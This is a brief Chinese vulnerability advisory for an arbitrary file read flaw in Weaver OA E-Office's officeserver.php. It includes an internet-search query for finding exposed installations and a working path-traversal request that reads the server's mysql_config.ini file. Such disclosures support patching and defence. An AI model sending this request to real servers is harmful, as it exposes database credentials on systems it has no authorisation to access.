泛微OA E-Office officeserver.php 任意文件读取漏洞

漏洞描述

泛微OA E-Office officeserver.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

漏洞影响

泛微OA E-Office

网络测绘

app=”泛微-EOffice”

漏洞复现

登录页面

20231208110510600-1629192036675-609c0b9d-2484-4e61-bb92-da8c1ce0067c.e3a60c7f_2023-12-08_11-04-47 (1)

验证POC

/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini

20231208174055433-1646044472614-5b3e654f-bde4-44e4-81b5-184c21585029.7840aeae_2023-12-08_17-39-17 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容